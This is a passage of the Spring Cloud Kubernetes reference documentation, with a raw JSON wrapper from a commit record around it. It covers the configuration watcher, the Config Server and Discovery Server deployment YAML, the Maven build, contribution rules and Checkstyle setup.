example\n\n====\n[source,yaml]\n----\napiVersion: v1\nkind: Service\nmetadata:\n labels:\n app: config-map-demo\n name: config-map-demo\n annotations:\n boot.spring.io\/actuator: http:\/\/:9090\/myactuator\/home\nspec:\n ports:\n - name: http\n port: 8080\n targetPort: 8080\n selector:\n app: config-map-demo\n----\n====\n\n\nAnother way you can choose to configure the actuator path and\/or management port is by setting\n`spring.cloud.kubernetes.configuration.watcher.actuatorPath` and `spring.cloud.kubernetes.configuration.watcher.actuatorPort`.\n\n### Messaging Implementation\n\nThe messaging implementation can be enabled by setting profile to either `bus-amqp` (RabbitMQ) or `bus-kafka` (Kafka) when the Spring Cloud Kubernetes Configuration Watcher\napplication is deployed to Kubernetes.\n\n### Configuring RabbitMQ\n\nWhen the `bus-amqp` profile is enabled you will need to configure Spring RabbitMQ to point it to the location of the RabbitMQ\ninstance you would like to use as well as any credentials necessary to authenticate. This can be done\nby setting the standard Spring RabbitMQ properties, for example\n\n====\n[source,yaml]\n----\nspring:\n rabbitmq:\n username: user\n password: password\n host: rabbitmq\n----\n====\n\n### Configuring Kafka\n\nWhen the `bus-kafka` profile is enabled you will need to configure Spring Kafka to point it to the location of the Kafka Broker\ninstance you would like to use. This can be done by setting the standard Spring Kafka properties, for example\n\n====\n[source,yaml]\n----\nspring:\n kafka:\n producer:\n bootstrap-servers: localhost:9092\n----\n====\n\n[#spring-cloud-kubernetes-configserver]\n## Spring Cloud Kubernetes Config Server\n\nThe Spring Cloud Kubernetes Config Server, is based on https:\/\/spring.io\/projects\/spring-cloud-config[Spring Cloud Config Server] and adds an https:\/\/docs.spring.io\/spring-cloud-config\/docs\/current\/reference\/html\/#_environment_repository[environment repository] for Kubernetes\nhttps:\/\/kubernetes.io\/docs\/concepts\/configuration\/configmap\/[Config Maps] and https:\/\/kubernetes.io\/docs\/concepts\/configuration\/secret\/[Secrets].\n\nThis is component is completely optional. However, it allows you to continue to leverage configuration\nyou may have stored in existing environment repositories (Git, SVN, Vault, etc) with applications that you are running on Kubernetes.\n\nA default image is located on https:\/\/hub.docker.com\/r\/springcloud\/spring-cloud-kubernetes-configserver[Docker Hub] which will allow you to easily get a Config Server deployed on Kubernetes without building\nthe code and image yourself. However, if you need to customize the config server behavior you can easily build your own\nimage from the source code on GitHub and use that.\n\n### Configuration\n\n#### Enabling The Kubernetes Environment Repository\nTo enable the Kubernetes environment repository the `kubernetes` profile must be included in the list of active profiles.\nYou may activate other profiles as well to use other environment repository implementations.\n\n#### Config Map and Secret PropertySources\nBy default, only Config Map data will be fetched. To enable Secrets as well you will need to set `spring.cloud.kubernetes.secrets.enableApi=true`.\nYou can disable the Config Map `PropertySource` by setting `spring.cloud.kubernetes.config.enableApi=false`.\n\n#### Fetching Config Map and Secret Data From Additional Namespaces\nBy default, the Kubernetes environment repository will only fetch Config Map and Secrets from the namespace in which it is deployed.\nIf you want to include data from other namespaces you can set `spring.cloud.kubernetes.configserver.config-map-namespaces` and\/or `spring.cloud.kubernetes.configserver.secrets-namespaces` to a comma separated\nlist of namespace values.\n\nNOTE: If you set `spring.cloud.kubernetes.configserver.config-map-namespaces` and\/or `spring.cloud.kubernetes.configserver.secrets-namespaces`\nyou will need to include the namespace in which the Config Server is deployed in order to continue to fetch Config Map and Secret data from that namespace.\n\n#### Kubernetes Access Controls\nThe Kubernetes Config Server uses the Kubernetes API server to fetch Config Map and Secret data. In order for it to do that\nit needs ability to `get` and `list` Config Map and Secrets (depending on what you enable\/disable).\n\n### Deployment Yaml\n\nBelow is a sample deployment, service and permissions configuration you can use to deploy a basic Config Server to Kubernetes.\n\n====\n[source,yaml]\n----\n---\napiVersion: v1\nkind: List\nitems:\n - apiVersion: v1\n kind: Service\n metadata:\n labels:\n app: spring-cloud-kubernetes-configserver\n name: spring-cloud-kubernetes-configserver\n spec:\n ports:\n - name: http\n port: 8888\n targetPort: 8888\n selector:\n app: spring-cloud-kubernetes-configserver\n type: ClusterIP\n - apiVersion: v1\n kind: ServiceAccount\n metadata:\n labels:\n app: spring-cloud-kubernetes-configserver\n name: spring-cloud-kubernetes-configserver\n - apiVersion: rbac.authorization.k8s.io\/v1\n kind: RoleBinding\n metadata:\n labels:\n app: spring-cloud-kubernetes-configserver\n name: spring-cloud-kubernetes-configserver:view\n roleRef:\n kind: Role\n apiGroup: rbac.authorization.k8s.io\n name: namespace-reader\n subjects:\n - kind: ServiceAccount\n name: spring-cloud-kubernetes-configserver\n - apiVersion: rbac.authorization.k8s.io\/v1\n kind: Role\n metadata:\n namespace: default\n name: namespace-reader\n rules:\n - apiGroups: [\"\", \"extensions\", \"apps\"]\n resources: [\"configmaps\", \"secrets\"]\n verbs: [\"get\", \"list\"]\n - apiVersion: apps\/v1\n kind: Deployment\n metadata:\n name: spring-cloud-kubernetes-configserver-deployment\n spec:\n selector:\n matchLabels:\n app: spring-cloud-kubernetes-configserver\n template:\n metadata:\n labels:\n app: spring-cloud-kubernetes-configserver\n spec:\n serviceAccount: spring-cloud-kubernetes-configserver\n containers:\n - name: spring-cloud-kubernetes-configserver\n image: springcloud\/spring-cloud-kubernetes-configserver\n imagePullPolicy: IfNotPresent\n env:\n - name: SPRING_PROFILES_INCLUDE\n value: \"kubernetes\"\n readinessProbe:\n httpGet:\n port: 8888\n path: \/actuator\/health\/readiness\n livenessProbe:\n httpGet:\n port: 8888\n path: \/actuator\/health\/liveness\n ports:\n - containerPort: 8888\n\n----\n====\n\n[#spring-cloud-kubernetes-discoveryserver]\n## Spring Cloud Kubernetes Discovery Server\n\nThe Spring Cloud Kubernetes Discovery Server provides HTTP endpoints apps can use to gather information\nabout services available within a Kubernetes cluster. The Spring Cloud Kubernetes Discovery Server\ncan be used by apps using the `spring-cloud-starter-kubernetes-discoveryclient` to provide data to\nthe `DiscoveryClient` implementation provided by that starter.\n\n### Permissions\nThe Spring Cloud Discovery server uses\nthe Kubernetes API server to get data about Service and Endpoint resrouces so it needs list, watch, and\nget permissions to use those endpoints. See the below sample Kubernetes deployment YAML for an\nexamlpe of how to configure the Service Account on Kubernetes.\n\n\n### Endpoints\nThere are three endpoints exposed by the server.\n\n#### `\/apps`\n\nA `GET` request sent to `\/apps` will return a JSON array of available services. Each item contains\nthe name of the Kubernetes service and service instance information. Below is a sample response.\n\n====\n[source,json]\n----\n[\n {\n \"name\":\"spring-cloud-kubernetes-discoveryserver\",\n \"serviceInstances\":[\n {\n \"instanceId\":\"836a2f25-daee-4af2-a1be-aab9ce2b938f\",\n \"serviceId\":\"spring-cloud-kubernetes-discoveryserver\",\n \"host\":\"10.244.1.6\",\n \"port\":8761,\n \"uri\":\"http:\/\/10.244.1.6:8761\",\n \"secure\":false,\n \"metadata\":{\n \"app\":\"spring-cloud-kubernetes-discoveryserver\",\n \"kubectl.kubernetes.io\/last-applied-configuration\":\"{\\\"apiVersion\\\":\\\"v1\\\",\\\"kind\\\":\\\"Service\\\",\\\"metadata\\\":{\\\"annotations\\\":{},\\\"labels\\\":{\\\"app\\\":\\\"spring-cloud-kubernetes-discoveryserver\\\"},\\\"name\\\":\\\"spring-cloud-kubernetes-discoveryserver\\\",\\\"namespace\\\":\\\"default\\\"},\\\"spec\\\":{\\\"ports\\\":[{\\\"name\\\":\\\"http\\\",\\\"port\\\":80,\\\"targetPort\\\":8761}],\\\"selector\\\":{\\\"app\\\":\\\"spring-cloud-kubernetes-discoveryserver\\\"},\\\"type\\\":\\\"ClusterIP\\\"}}\\n\",\n \"http\":\"8761\"\n },\n \"namespace\":\"default\",\n \"scheme\":\"http\"\n }\n ]\n },\n {\n \"name\":\"kubernetes\",\n \"serviceInstances\":[\n {\n \"instanceId\":\"1234\",\n \"serviceId\":\"kubernetes\",\n \"host\":\"172.18.0.3\",\n \"port\":6443,\n \"uri\":\"http:\/\/172.18.0.3:6443\",\n \"secure\":false,\n \"metadata\":{\n \"provider\":\"kubernetes\",\n \"component\":\"apiserver\",\n \"https\":\"6443\"\n },\n \"namespace\":\"default\",\n \"scheme\":\"http\"\n }\n ]\n }\n]\n----\n====\n\n#### `\/app\/{name}`\n\nA `GET` request to `\/app\/{name}` can be used to get instance data for all instances of a given\nservice. Below is a sample response when a `GET` request is made to `\/app\/kubernetes`.\n\n====\n[source,json]\n----\n[\n {\n \"instanceId\":\"1234\",\n \"serviceId\":\"kubernetes\",\n \"host\":\"172.18.0.3\",\n \"port\":6443,\n \"uri\":\"http:\/\/172.18.0.3:6443\",\n \"secure\":false,\n \"metadata\":{\n \"provider\":\"kubernetes\",\n \"component\":\"apiserver\",\n \"https\":\"6443\"\n },\n \"namespace\":\"default\",\n \"scheme\":\"http\"\n }\n]\n----\n====\n\n#### `\/app\/{name}\/{instanceid}`\n\nA `GET` request made to `\/app\/{name}\/{instanceid}` will return the instance data for a specific\ninstance of a given service. Below is a sample response when a `GET` request is made to `\/app\/kubernetes\/1234`.\n\n====\n[source,json]\n----\n {\n \"instanceId\":\"1234\",\n \"serviceId\":\"kubernetes\",\n \"host\":\"172.18.0.3\",\n \"port\":6443,\n \"uri\":\"http:\/\/172.18.0.3:6443\",\n \"secure\":false,\n \"metadata\":{\n \"provider\":\"kubernetes\",\n \"component\":\"apiserver\",\n \"https\":\"6443\"\n },\n \"namespace\":\"default\",\n \"scheme\":\"http\"\n }\n----\n====\n\n### Deployment YAML\n\nAn image of the Spring Cloud Discovery Server is hosted on https:\/\/hub.docker.com\/r\/springcloud\/spring-cloud-kubernetes-discoveryserver[Docker Hub].\n\nBelow is a sample deployment YAML you can use to deploy the Kubernetes Configuration Watcher to Kubernetes.\n\n====\n[source,yaml]\n----\n---\napiVersion: v1\nkind: List\nitems:\n - apiVersion: v1\n kind: Service\n metadata:\n labels:\n app: spring-cloud-kubernetes-discoveryserver\n name: spring-cloud-kubernetes-discoveryserver\n spec:\n ports:\n - name: http\n port: 80\n targetPort: 8761\n selector:\n app: spring-cloud-kubernetes-discoveryserver\n type: ClusterIP\n - apiVersion: v1\n kind: ServiceAccount\n metadata:\n labels:\n app: spring-cloud-kubernetes-discoveryserver\n name: spring-cloud-kubernetes-discoveryserver\n - apiVersion: rbac.authorization.k8s.io\/v1\n kind: RoleBinding\n metadata:\n labels:\n app: spring-cloud-kubernetes-discoveryserver\n name: spring-cloud-kubernetes-discoveryserver:view\n roleRef:\n kind: Role\n apiGroup: rbac.authorization.k8s.io\n name: namespace-reader\n subjects:\n - kind: ServiceAccount\n name: spring-cloud-kubernetes-discoveryserver\n - apiVersion: rbac.authorization.k8s.io\/v1\n kind: Role\n metadata:\n namespace: default\n name: namespace-reader\n rules:\n - apiGroups: [\"\", \"extensions\", \"apps\"]\n resources: [\"services\", \"endpoints\"]\n verbs: [\"get\", \"list\", \"watch\"]\n - apiVersion: apps\/v1\n kind: Deployment\n metadata:\n name: spring-cloud-kubernetes-discoveryserver-deployment\n spec:\n selector:\n matchLabels:\n app: spring-cloud-kubernetes-discoveryserver\n template:\n metadata:\n labels:\n app: spring-cloud-kubernetes-discoveryserver\n spec:\n serviceAccount: spring-cloud-kubernetes-discoveryserver\n containers:\n - name: spring-cloud-kubernetes-discoveryserver\n image: springcloud\/spring-cloud-kubernetes-discoveryserver:3.0.0-SNAPSHOT\n imagePullPolicy: IfNotPresent\n readinessProbe:\n httpGet:\n port: 8761\n path: \/actuator\/health\/readiness\n livenessProbe:\n httpGet:\n port: 8761\n path: \/actuator\/health\/liveness\n ports:\n - containerPort: 8761\n\n\n----\n====\n\n== Examples\n\nSpring Cloud Kubernetes tries to make it transparent for your applications to consume Kubernetes Native Services by\nfollowing the Spring Cloud interfaces.\n\nIn your applications, you need to add the `spring-cloud-kubernetes-discovery` dependency to your classpath and remove any other dependency that contains a `DiscoveryClient` implementation (that is, a Eureka discovery client).\nThe same applies for `PropertySourceLocator`, where you need to add to the classpath the `spring-cloud-kubernetes-config` and remove any other dependency that contains a `PropertySourceLocator` implementation (that is, a configuration server client).\n\nThe following projects highlight the usage of these dependencies and demonstrate how you can use these libraries from any Spring Boot application:\n\n* https:\/\/github.com\/spring-cloud\/spring-cloud-kubernetes\/tree\/master\/spring-cloud-kubernetes-examples[Spring Cloud Kubernetes Examples]: the ones located inside this repository.\n* Spring Cloud Kubernetes Full Example: Minions and Boss\n\t** https:\/\/github.com\/salaboy\/spring-cloud-k8s-minion[Minion]\n\t** https:\/\/github.com\/salaboy\/spring-cloud-k8s-boss[Boss]\n* Spring Cloud Kubernetes Full Example: https:\/\/github.com\/salaboy\/s1p_docs[SpringOne Platform Tickets Service]\n* https:\/\/github.com\/salaboy\/s1p_gateway[Spring Cloud Gateway with Spring Cloud Kubernetes Discovery and Config]\n* https:\/\/github.com\/salaboy\/showcase-admin-tool[Spring Boot Admin with Spring Cloud Kubernetes Discovery and Config]\n\n== Other Resources\n\nThis section lists other resources, such as presentations (slides) and videos about Spring Cloud Kubernetes.\n\n* https:\/\/salaboy.com\/2018\/09\/27\/the-s1p-experience\/[S1P Spring Cloud on PKS]\n* https:\/\/salaboy.com\/2018\/07\/18\/ljc-july-18-spring-cloud-docker-k8s\/[Spring Cloud, Docker, Kubernetes -> London Java Community July 2018]\n\n\nPlease feel free to submit other resources through pull requests to https:\/\/github.com\/spring-cloud\/spring-cloud-kubernetes[this repository].\n\n== Configuration properties\n\nTo see the list of all Kubernetes related configuration properties please check link:appendix.html[the Appendix page].\n\n== Building\n\n:jdkversion: 17\n\n=== Basic Compile and Test\n\nTo build the source you will need to install JDK {jdkversion}.\n\nSpring Cloud uses Maven for most build-related activities, and you\nshould be able to get off the ground quite quickly by cloning the\nproject you are interested in and typing\n\n----\n$ .\/mvnw install\n----\n\nNOTE: You can also install Maven (>=3.3.3) yourself and run the `mvn` command\nin place of `.\/mvnw` in the examples below. If you do that you also\nmight need to add `-P spring` if your local Maven settings do not\ncontain repository declarations for spring pre-release artifacts.\n\nNOTE: Be aware that you might need to increase the amount of memory\navailable to Maven by setting a `MAVEN_OPTS` environment variable with\na value like `-Xmx512m -XX:MaxPermSize=128m`. We try to cover this in\nthe `.mvn` configuration, so if you find you have to do it to make a\nbuild succeed, please raise a ticket to get the settings added to\nsource control.\n\nThe projects that require middleware (i.e. Redis) for testing generally\nrequire that a local instance of [Docker](https:\/\/www.docker.com\/get-started) is installed and running.\n\n\n=== Documentation\n\nThe spring-cloud-build module has a \"docs\" profile, and if you switch\nthat on it will try to build asciidoc sources from\n`src\/main\/asciidoc`. As part of that process it will look for a\n`README.adoc` and process it by loading all the includes, but not\nparsing or rendering it, just copying it to `${main.basedir}`\n(defaults to `${basedir}`, i.e. the root of the project). If there are\nany changes in the README it will then show up after a Maven build as\na modified file in the correct place. Just commit it and push the change.\n\n=== Working with the code\nIf you don't have an IDE preference we would recommend that you use\nhttps:\/\/www.springsource.com\/developer\/sts[Spring Tools Suite] or\nhttps:\/\/eclipse.org[Eclipse] when working with the code. We use the\nhttps:\/\/eclipse.org\/m2e\/[m2eclipse] eclipse plugin for maven support. Other IDEs and tools\nshould also work without issue as long as they use Maven 3.3.3 or better.\n\n==== Activate the Spring Maven profile\nSpring Cloud projects require the 'spring' Maven profile to be activated to resolve\nthe spring milestone and snapshot repositories. Use your preferred IDE to set this\nprofile to be active, or you may experience build errors.\n\n==== Importing into eclipse with m2eclipse\nWe recommend the https:\/\/eclipse.org\/m2e\/[m2eclipse] eclipse plugin when working with\neclipse. If you don't already have m2eclipse installed it is available from the \"eclipse\nmarketplace\".\n\nNOTE: Older versions of m2e do not support Maven 3.3, so once the\nprojects are imported into Eclipse you will also need to tell\nm2eclipse to use the right profile for the projects. If you\nsee many different errors related to the POMs in the projects, check\nthat you have an up to date installation. If you can't upgrade m2e,\nadd the \"spring\" profile to your `settings.xml`. Alternatively you can\ncopy the repository settings from the \"spring\" profile of the parent\npom into your `settings.xml`.\n\n==== Importing into eclipse without m2eclipse\nIf you prefer not to use m2eclipse you can generate eclipse project metadata using the\nfollowing command:\n\n[indent=0]\n----\n\t$ .\/mvnw eclipse:eclipse\n----\n\nThe generated eclipse projects can be imported by selecting `import existing projects`\nfrom the `file` menu.\n\n\n== Contributing\n\n:spring-cloud-build-branch: master\n\nSpring Cloud is released under the non-restrictive Apache 2.0 license,\nand follows a very standard Github development process, using Github\ntracker for issues and merging pull requests into master. If you want\nto contribute even something trivial please do not hesitate, but\nfollow the guidelines below.\n\n=== Sign the Contributor License Agreement\nBefore we accept a non-trivial patch or pull request we will need you to sign the\nhttps:\/\/cla.pivotal.io\/sign\/spring[Contributor License Agreement].\nSigning the contributor's agreement does not grant anyone commit rights to the main\nrepository, but it does mean that we can accept your contributions, and you will get an\nauthor credit if we do. Active contributors might be asked to join the core team, and\ngiven the ability to merge pull requests.\n\n=== Code of Conduct\nThis project adheres to the Contributor Covenant https:\/\/github.com\/spring-cloud\/spring-cloud-build\/blob\/master\/docs\/src\/main\/asciidoc\/code-of-conduct.adoc[code of\nconduct]. By participating, you are expected to uphold this code. Please report\nunacceptable behavior to spring-code-of-conduct@pivotal.io.\n\n=== Code Conventions and Housekeeping\nNone of these is essential for a pull request, but they will all help. They can also be\nadded after the original pull request but before a merge.\n\n* Use the Spring Framework code format conventions. If you use Eclipse\n you can import formatter settings using the\n `eclipse-code-formatter.xml` file from the\n https:\/\/raw.githubusercontent.com\/spring-cloud\/spring-cloud-build\/master\/spring-cloud-dependencies-parent\/eclipse-code-formatter.xml[Spring\n Cloud Build] project. If using IntelliJ, you can use the\n https:\/\/plugins.jetbrains.com\/plugin\/6546[Eclipse Code Formatter\n Plugin] to import the same file.\n* Make sure all new `.java` files to have a simple Javadoc class comment with at least an\n `@author` tag identifying you, and preferably at least a paragraph on what the class is\n for.\n* Add the ASF license header comment to all new `.java` files (copy from existing files\n in the project)\n* Add yourself as an `@author` to the .java files that you modify substantially (more\n than cosmetic changes).\n* Add some Javadocs and, if you change the namespace, some XSD doc elements.\n* A few unit tests would help a lot as well -- someone has to do it.\n* If no-one else is using your branch, please rebase it against the current master (or\n other target branch in the main project).\n* When writing a commit message please follow https:\/\/tbaggery.com\/2008\/04\/19\/a-note-about-git-commit-messages.html[these conventions],\n if you are fixing an existing issue please add `Fixes gh-XXXX` at the end of the commit\n message (where XXXX is the issue number).\n\n=== Checkstyle\n\nSpring Cloud Build comes with a set of checkstyle rules. You can find them in the `spring-cloud-build-tools` module. The most notable files under the module are:\n\n.spring-cloud-build-tools\/\n----\n\u2514\u2500\u2500 src\n \u00a0\u00a0 \u251c\u2500\u2500 checkstyle\n \u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 checkstyle-suppressions.xml <3>\n \u00a0\u00a0 \u2514\u2500\u2500 main\n \u00a0\u00a0 \u2514\u2500\u2500 resources\n \u00a0\u00a0 \u251c\u2500\u2500 checkstyle-header.txt <2>\n \u00a0\u00a0 \u2514\u2500\u2500 checkstyle.xml <1>\n----\n<1> Default Checkstyle rules\n<2> File header setup\n<3> Default suppression rules\n\n==== Checkstyle configuration\n\nCheckstyle rules are *disabled by default*. To add checkstyle to your project just define the following properties and plugins.\n\n.pom.xml\n----\n<properties>\n<maven-checkstyle-plugin.failsOnError>true<\/maven-checkstyle-plugin.failsOnError> <1>\n <maven-checkstyle-plugin.failsOnViolation>true\n <\/maven-checkstyle-plugin.failsOnViolation> <2>\n <maven-checkstyle-plugin.includeTestSourceDirectory>true\n <\/maven-checkstyle-plugin.includeTestSourceDirectory> <3>\n<\/properties>\n\n<build>\n <plugins>\n <plugin> <4>\n <groupId>io.spring.javaformat<\/groupId>\n <artifactId>spring-javaformat-maven-plugin<\/artifactId>\n <\/plugin>\n <plugin> <5>\n <groupId>org.apache.maven.plugins<\/groupId>\n <artifactId>maven-checkstyle-plugin<\/artifactId>\n <\/plugin>\n <\/plugins>\n\n <reporting>\n <plugins>\n <plugin> <5>\n <groupId>org.apache.maven.plugins<\/groupId>\n <artifactId>maven-checkstyle-plugin<\/artifactId>\n <\/plugin>\n <\/plugins>\n <\/reporting>\n<\/build>\n----\n<1> Fails the build upon Checkstyle errors\n<2> Fails the build upon Checkstyle violations\n<3> Checkstyle analyzes also the test sources\n<4> Add the Spring Java Format plugin that will reformat your code to pass most of the Checkstyle formatting rules\n<5> Add checkstyle plugin to your build and reporting phases\n\nIf you need to suppress some rules (e.g. line length needs to be longer), then it's enough for you to define a file under `${project.root}\/src\/checkstyle\/checkstyle-suppressions.xml` with your suppressions. Example:\n\n.projectRoot\/src\/checkstyle\/checkstyle-suppresions.xml\n----\n<?xml version=\"1.0\"?>\n<!DOCTYPE suppressions PUBLIC\n\t\t\"-\/\/Puppy Crawl\/\/DTD Suppressions 1.1\/\/EN\"\n\t\t\"https:\/\/www.puppycrawl.com\/dtds\/suppressions_1_1.dtd\">\n<suppressions>\n\t<suppress files=\".*ConfigServerApplication\\.java\" checks=\"HideUtilityClassConstructor\"\/>\n\t<suppress files=\".*ConfigClientWatch\\.java\" checks=\"LineLengthCheck\"\/>\n<\/suppressions>\n----\n\nIt's advisable to copy the `${spring-cloud-build.rootFolder}\/.editorconfig` and `${spring-cloud-build.rootFolder}\/.springformat` to your project. That way, some default formatting rules will be applied. You can do so by running this script:\n\n```bash\n$ curl https:\/\/raw.githubusercontent.com\/spring-cloud\/spring-cloud-build\/master\/.editorconfig -o .editorconfig\n$ touch .springformat\n```\n\n=== IDE setup\n\n==== Intellij IDEA\n\nIn order to setup Intellij you should import our coding conventions, inspection profiles and set up the checkstyle plugin.\nThe following files can be found in the https:\/\/github.com\/spring-cloud\/spring-cloud-build\/tree\/master\/spring-cloud-build-tools[Spring Cloud Build] project.\n\n.spring-cloud-build-tools\/\n----\n\u2514\u2500\u2500 src\n \u00a0\u00a0 \u251c\u2500\u2500 checkstyle\n \u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 checkstyle-suppressions.xml <3>\n \u00a0\u00a0 \u2514\u2500\u2500 main\n \u00a0\u00a0 \u2514\u2500\u2500 resources\n \u00a0\u00a0 \u251c\u2500\u2500 checkstyle-header.txt <2>\n \u00a0\u00a0 \u251c\u2500\u2500 checkstyle.xml <1>\n \u00a0\u00a0 \u2514\u2500\u2500 intellij\n \u00a0\u00a0 \u00a0\u00a0 \u251c\u2500\u2500 Intellij_Project_Defaults.xml <4>\n \u00a0\u00a0 \u00a0\u00a0 \u2514\u2500\u2500 Intellij_Spring_Boot_Java_Conventions.xml <5>\n----\n<1> Default Checkstyle rules\n<2> File header setup\n<3> Default suppression rules\n<4> Project defaults for Intellij that apply most of Checkstyle rules\n<5> Project style conventions for Intellij that apply most of Checkstyle rules\n\n.Code style\n\nimage::https:\/\/raw.githubusercontent.com\/spring-cloud\/spring-cloud-build\/{spring-cloud-build-branch}\/docs\/src\/main\/asciidoc\/images\/intellij-code-style.png[Code style]\n\nGo to `File` -> `Settings` -> `Editor` -> `Code style`. There click on the icon next to the `Scheme` section. There, click on the `Import Scheme` value and pick the `Intellij IDEA code style XML` option. Import the `spring-cloud-build-tools\/src\/main\/resources\/intellij\/Intellij_Spring_Boot_Java_Conventions.xml` file.\n\n.Inspection profiles\n\nimage::https:\/\/raw.githubusercontent.com\/spring-cloud\/spring-cloud-build\/{spring-cloud-build-branch}\/docs\/src\/main\/asciidoc\/images\/intellij-inspections.png[Code style]\n\nGo to `File` -> `Settings` -> `Editor` -> `Inspections`. There click on the icon next to the `Profile` section. There, click on the `Import Profile` and import the `spring-cloud-build-tools\/src\/main\/resources\/intellij\/Intellij_Project_Defaults.xml` file.\n\n.Checkstyle\n\nTo have Intellij work with Checkstyle, you have to install the `Checkstyle` plugin. It's advisable to also install the `Assertions2Assertj` to automatically convert the JUnit assertions\n\nimage::https:\/\/raw.githubusercontent.com\/spring-cloud\/spring-cloud-build\/{spring-cloud-build-branch}\/docs\/src\/main\/asciidoc\/images\/intellij-checkstyle.png[Checkstyle]\n\nGo to `File` -> `Settings` -> `Other settings` -> `Checkstyle`. There click on the `+` icon in the `Configuration file` section. There, you'll have to define where the checkstyle rules should be picked from. In the image above, we've picked the rules from the cloned Spring Cloud Build repository. However, you can point to the Spring Cloud Build's GitHub repository (e.g. for the `checkstyle.xml` : `https:\/\/raw.githubusercontent.com\/spring-cloud\/spring-cloud-build\/master\/spring-cloud-build-tools\/src\/main\/resources\/checkstyle.xml`). We need to provide the following variables:\n\n- `checkstyle.header.file` - please point it to the Spring Cloud Build's, `spring-cloud-build-tools\/src\/main\/resources\/checkstyle-header.txt` file either in your cloned repo or via the `https:\/\/raw.githubusercontent.com\/spring-cloud\/spring-cloud-build\/master\/spring-cloud-build-tools\/src\/main\/resources\/checkstyle-header.txt` URL.\n- `checkstyle.suppressions.file` - default suppressions. Please point it to the Spring Cloud Build's, `spring-cloud-build-tools\/src\/checkstyle\/checkstyle-suppressions.xml` file either in your cloned repo or via the `https:\/\/raw.githubusercontent.com\/spring-cloud\/spring-cloud-build\/master\/spring-cloud-build-tools\/src\/checkstyle\/checkstyle-suppressions.xml` URL.\n- `checkstyle.additional.suppressions.file` - this variable corresponds to suppressions in your local project. E.g. you're working on `spring-cloud-contract`. Then point to the `project-root\/src\/checkstyle\/checkstyle-suppressions.xml` folder. Example for `spring-cloud-contract` would be: `\/home\/username\/spring-cloud-contract\/src\/checkstyle\/checkstyle-suppressions.xml`.\n\nIMPORTANT: Remember to set the `Scan Scope` to `All sources` since we apply checkstyle rules for production and test sources.\n\n=== Duplicate Finder\n\nSpring Cloud Build brings along the `basepom:duplicate-finder-maven-plugin`, that enables flagging duplicate and conflicting classes and resources on the java classpath.\n\n==== Duplicate Finder configuration\n\nDuplicate finder is *enabled by default* and will run in the `verify` phase of your Maven build, but it will only take effect in your project if you add the `duplicate-finder-maven-plugin` to the `build` section of the projecst's `pom.xml`.\n\n.pom.xml\n[source,xml]\n----\n<build>\n <plugins>\n <plugin>\n <groupId>org.basepom.maven<\/groupId>\n <artifactId>duplicate-finder-maven-plugin<\/artifactId>\n <\/plugin>\n <\/plugins>\n<\/build>\n----\n\nFor other properties, we have set defaults as listed in the https:\/\/github.com\/basepom\/duplicate-finder-maven-plugin\/wiki[plugin documentation].\n\nYou can easily override them but setting the value of the selected property prefixed with `duplicate-finder-maven-plugin`. For example, set `duplicate-finder-maven-plugin.skip` to `true` in order to skip duplicates check in your build.\n\nIf you need to add `ignoredClassPatterns` or `ignoredResourcePatterns` to your setup, make sure to add them in the plugin configuration section of your project:\n\n[source,xml]\n----\n<build>\n <plugins>\n <plugin>\n <groupId>org.basepom.maven<\/groupId>\n <artifactId>duplicate-finder-maven-plugin<\/artifactId>\n <configuration>\n <ignoredClassPatterns>\n <ignoredClassPattern>org.joda.time.base.BaseDateTime<\/ignoredClassPattern>\n <ignoredClassPattern>.*module-info<\/ignoredClassPattern>\n <\/ignoredClassPatterns>\n <ignoredResourcePatterns>\n <ignoredResourcePattern>changelog.txt<\/ignoredResourcePattern>\n <\/ignoredResourcePatterns>\n <\/configuration>\n <\/plugin>\n <\/plugins>\n<\/build>\n\n\n----\n\n","old_contents":"\/\/\/\/\nDO NOT EDIT THIS FILE. IT WAS GENERATED.\nManual changes to this file will be lost when it is generated again.\nEdit the files in the src\/main\/asciidoc\/ directory instead.\n\/\/\/\/\n\n\n= Spring Cloud Kubernetes\n:doctype: book\n:idprefix:\n:idseparator: -\n:toc: left\n:toclevels: 4\n:tabsize: 4\n:numbered:\n:sectanchors:\n:sectnums:\n:icons: font\n:hide-uri-scheme:\n:docinfo: shared,private\n\n:sc-ext: java\n:project-full-name: Spring Cloud Kubernetes\n:all: {asterisk}{asterisk}\n\nThis reference guide covers how to use Spring Cloud Kubernetes.\n\n== Why do you need Spring Cloud Kubernetes?\n\nSpring Cloud Kubernetes provides implementations of well known Spring Cloud interfaces allowing developers to build and run Spring Cloud applications on Kubernetes. While this project may be useful to you when building a cloud native application, it is also not a requirement in order to deploy a Spring Boot app on Kubernetes. If you are just getting started in your journey to running your Spring Boot app on Kubernetes you can accomplish a lot with nothing more than a basic Spring Boot app and Kubernetes itself. To learn more, you can get started by reading the https:\/\/docs.spring.io\/spring-boot\/docs\/current\/reference\/htmlsingle\/#cloud-deployment-kubernetes[Spring Boot reference documentation for deploying to Kubernetes ] and also working through the workshop material https:\/\/hackmd.io\/@ryanjbaxter\/spring-on-k8s-workshop[Spring and Kubernetes].\n\n== Starters\n\nStarters are convenient dependency descriptors you can include in your\napplication. Include a starter to get the dependencies and Spring Boot\nauto-configuration for a feature set. Starters that begin with `spring-cloud-starter-kubernetes-fabric8`\nprovide implementations using the https:\/\/github.com\/fabric8io\/kubernetes-client[Fabric8 Kubernetes Java Client].\nStarters that begin with\n`spring-cloud-starter-kubernetes-client` provide implementations using the https:\/\/github.com\/kubernetes-client\/java[Kubernetes Java Client].\n\n[cols=\"a,d\"]\n|===\n| Starter | Features\n\n| [source,xml]\n.Fabric8 Dependency\n----\n<dependency>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-starter-kubernetes-fabric8<\/artifactId>\n<\/dependency>\n----\n\n[source,xml]\n.Kubernetes Client Dependency\n----\n<dependency>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-starter-kubernetes-client<\/artifactId>\n<\/dependency>\n----\n| <<DiscoveryClient for Kubernetes,Discovery Client>> implementation that\nresolves service names to Kubernetes Services.\n\n| [source,xml]\n.Fabric8 Dependency\n----\n<dependency>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-starter-kubernetes-fabric8-config<\/artifactId>\n<\/dependency>\n----\n\n[source,xml]\n.Kubernetes Client Dependency\n----\n<dependency>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-starter-kubernetes-client-config<\/artifactId>\n<\/dependency>\n----\n| Load application properties from Kubernetes\n<<configmap-propertysource,ConfigMaps>> 